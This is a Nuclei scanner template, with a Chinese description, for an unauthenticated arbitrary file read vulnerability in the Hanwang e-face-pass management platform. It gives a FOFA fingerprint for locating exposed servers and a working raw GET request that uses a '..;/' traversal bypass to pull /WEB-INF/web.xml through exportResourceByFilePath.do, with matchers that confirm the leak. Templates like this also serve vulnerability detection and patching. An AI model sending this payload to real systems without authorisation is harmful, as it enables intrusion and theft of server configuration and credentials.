id: hanwangE-exportResourceByFilePath_do-File-reading

info:
  name: 汉王e脸通综合管理平台 exportResourceByFilePath 任意文件读取漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: icon_hash="1380907357"
    汉王e脸通综合管理平台 exportResourceByFilePath 接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
  reference:
    - https://mp.weixin.qq.com/s/VijX9UNQGnLOeG6Tr648uA
  tags: File reading

http:
  - raw:
      - |
        GET /manage/intercom/..;/..;/manage/leaveList/exportResourceByFilePath.do?filePath=/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<?xml version='
          - '<web-app'
          - '</web-app>'
          - '<context-param>'
          - '</context-param>'
        condition: and
      - type: status
        status: 
          - 200